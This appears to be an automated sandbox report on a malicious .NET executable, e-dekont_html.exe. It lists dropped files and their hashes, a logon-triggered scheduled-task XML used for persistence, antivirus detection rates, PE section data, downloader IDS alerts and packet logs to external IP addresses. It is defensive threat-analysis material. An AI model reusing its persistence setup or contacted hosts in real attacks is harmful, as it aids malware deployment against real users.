                                                                                                                                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1574
                                                                                                                                                        Entropy (8bit):5.1089451320984685
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta8Rxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT3v
                                                                                                                                                        MD5:940AF28B4D86EE6583C9513B54BBCE43
                                                                                                                                                        SHA1:92B5A067E5A4FFB66D9BC778E35967BECB327F0F
                                                                                                                                                        SHA-256:63968750CB9EE6D99982934580342E7744C4B573F5B823483EF610217883AEE2
                                                                                                                                                        SHA-512:B5C520EAA53C5382FFCB684F3CFF35C1C655268408BDFE0C8C02D650B333CE7746768E6B3D4F36544B16F5B25040BD76DC78D0F4EB4C698C48CF0BC8D5669BA5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1574
                                                                                                                                                        Entropy (8bit):5.1089451320984685
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta8Rxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT3v
                                                                                                                                                        MD5:940AF28B4D86EE6583C9513B54BBCE43
                                                                                                                                                        SHA1:92B5A067E5A4FFB66D9BC778E35967BECB327F0F
                                                                                                                                                        SHA-256:63968750CB9EE6D99982934580342E7744C4B573F5B823483EF610217883AEE2
                                                                                                                                                        SHA-512:B5C520EAA53C5382FFCB684F3CFF35C1C655268408BDFE0C8C02D650B333CE7746768E6B3D4F36544B16F5B25040BD76DC78D0F4EB4C698C48CF0BC8D5669BA5
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                        Process:C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):709120
                                                                                                                                                        Entropy (8bit):7.9449809569809435
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:3kMEo7ji/Ov/qIwJbBcWnusvfmWzoHsDR085/RpKKnKbKBA5A2fXG:3kDo7xSKWnueX1RN5/RDndB7g
                                                                                                                                                        MD5:3C1D34A25A8B8A96896E746F13C346BF
                                                                                                                                                        SHA1:31C17EEBFFBCB57A3A833C99541748E508D82714
                                                                                                                                                        SHA-256:7BD9596F753E58BA917BA418C191AF8FCB9B537E73EE6A86989960099585394F
                                                                                                                                                        SHA-512:3854B5186E2A7BED2FF290C8DDCAB311FD3B431CA3AE8A5BCE2322907731A9C105316FF43E15DC2EBA870AB8948E097C37AFD77F21A5CFD7D148FC0378F4A847
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 67%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?<g..............0.................. ........@.. ....................... ............@.....................................O.......................................T............................................ ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........}...O......i....................................................0..$..........s......s.....s ......o!...&..+..*.0..)........s\....s.......o[...s......o".......+...*....0..+........s\....r...p.(#......o[...s......o$....+..*..0..0........s\....rC..p.r...p(%......o[...s......o$....+..*.0...........s\.......O...%.r...p.%...%.r...p.%...%.r...p.%....%.r!..p.%....%.r;..p.%.....%..rU..p.%.....%..ry..p.%....%..r...p.(&......o[...s.......o$...&r...p('...&......o(...('...&...*.
                                                                                                                                                        Process:C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26
                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Entropy (8bit):7.9449809569809435
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                        File name:e-dekont_html.exe
                                                                                                                                                        File size:709'120 bytes
                                                                                                                                                        MD5:3c1d34a25a8b8a96896e746f13c346bf
                                                                                                                                                        SHA1:31c17eebffbcb57a3a833c99541748e508d82714
                                                                                                                                                        SHA256:7bd9596f753e58ba917ba418c191af8fcb9b537e73ee6a86989960099585394f
                                                                                                                                                        SHA512:3854b5186e2a7bed2ff290c8ddcab311fd3b431ca3ae8a5bce2322907731a9c105316ff43e15dc2eba870ab8948e097c37afd77f21a5cfd7d148fc0378f4a847
                                                                                                                                                        SSDEEP:12288:3kMEo7ji/Ov/qIwJbBcWnusvfmWzoHsDR085/RpKKnKbKBA5A2fXG:3kDo7xSKWnueX1RN5/RDndB7g
                                                                                                                                                        TLSH:8AE4125025D44FA6F0BE8BF1D261A00433F57D76B831F64D4EE330EE2AA9F514922A67
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?<g..............0.................. ........@.. ....................... ............@................................
                                                                                                                                                        Icon Hash:4f81888c8c89874f
                                                                                                                                                        Entrypoint:0x4ad51a
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x673C3FA8 [Tue Nov 19 07:35:04 2024 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:4
                                                                                                                                                        OS Version Minor:0
                                                                                                                                                        File Version Major:4
                                                                                                                                                        File Version Minor:0
                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                        Instruction
                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xad4c5 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xae000 | 0x1794 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb0000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xab3c0 | 0x54 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xab520 | 0xab600 | a1e0ddb0cb65a62c6691914364370a29 | False | 0.957757795404814 | data | 7.952098121903517 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xae000 | 0x1794 | 0x1800 | 8edeef6c6ad3b86beac5a0e1f89c6841 | False | 0.3896484375 | data | 5.71864779722505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb0000 | 0xc | 0x200 | 61abefaeef45b71b47b992a51c176f33 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xae130 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | | | 0.37406191369606
RT_GROUP_ICON | 0xaf1d8 | 0x14 | data | | | 1.1
RT_VERSION | 0xaf1ec | 0x3bc | data | | | 0.4131799163179916
RT_MANIFEST | 0xaf5a8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-20T07:52:12.696787+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49733 | 193.122.130.0 | 80 | TCP
2024-11-20T07:52:13.697027+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49733 | 193.122.130.0 | 80 | TCP
2024-11-20T07:52:14.228878+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | TCP
2024-11-20T07:52:15.024961+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49738 | 193.122.130.0 | 80 | TCP
2024-11-20T07:52:15.513508+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49739 | 188.114.97.3 | 443 | TCP
2024-11-20T07:52:18.243695+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49741 | 193.122.130.0 | 80 | TCP
2024-11-20T07:52:19.462372+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49741 | 193.122.130.0 | 80 | TCP
2024-11-20T07:52:19.513508+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49745 | 188.114.97.3 | 443 | TCP
2024-11-20T07:52:20.075811+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49746 | 188.114.97.3 | 443 | TCP
2024-11-20T07:52:20.634261+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49749 | 193.122.130.0 | 80 | TCP
2024-11-20T07:52:21.872740+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49752 | 188.114.96.3 | 443 | TCP
2024-11-20T07:52:23.778611+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49759 | 188.114.96.3 | 443 | TCP
2024-11-20T07:52:24.029099+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49760 | 188.114.96.3 | 443 | TCP
2024-11-20T07:52:26.148930+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49765 | 188.114.96.3 | 443 | TCP
2024-11-20T07:52:27.582198+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 61283 | 188.114.96.3 | 443 | TCP
                                                                                                                                                        Nov 20, 2024 07:52:18.946315050 CET49745443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:18.946345091 CET44349745188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.189605951 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.235330105 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.299958944 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.300029993 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.300193071 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.304037094 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.308557987 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.313532114 CET8049741193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.398497105 CET44349745188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.400697947 CET49745443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.400765896 CET44349745188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.414479971 CET8049741193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.417197943 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.417260885 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.417437077 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.417769909 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.417799950 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.462372065 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.513514042 CET44349745188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.513581038 CET44349745188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.513699055 CET49745443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.514292002 CET49745443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.518639088 CET4974380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.519917965 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.523821115 CET8049743193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.523962975 CET4974380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.524764061 CET8049747193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.524863958 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.524987936 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.529803991 CET8049747193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.920553923 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.922390938 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.922439098 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.009561062 CET8049747193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.018743992 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.018791914 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.018857956 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.019155979 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.019171000 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.056193113 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.075828075 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.075896025 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.076116085 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:20.076463938 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:20.080478907 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.081752062 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.085773945 CET8049741193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.085839033 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.086711884 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.086822987 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.086951971 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.092398882 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.489943981 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.491785049 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.491822004 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.587681055 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.589453936 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.589504004 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.589570999 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.589952946 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.589963913 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.620990992 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.621140003 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.621205091 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.621777058 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.625353098 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.626733065 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.630686998 CET8049747193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.630763054 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.631772041 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.631932020 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.632050991 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.634260893 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.637120962 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.094069004 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.134260893 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.168705940 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.168732882 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.240581036 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.241926908 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.241975069 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.242046118 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.242321968 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.242356062 CET44349752188.114.96.3192.168.2.4
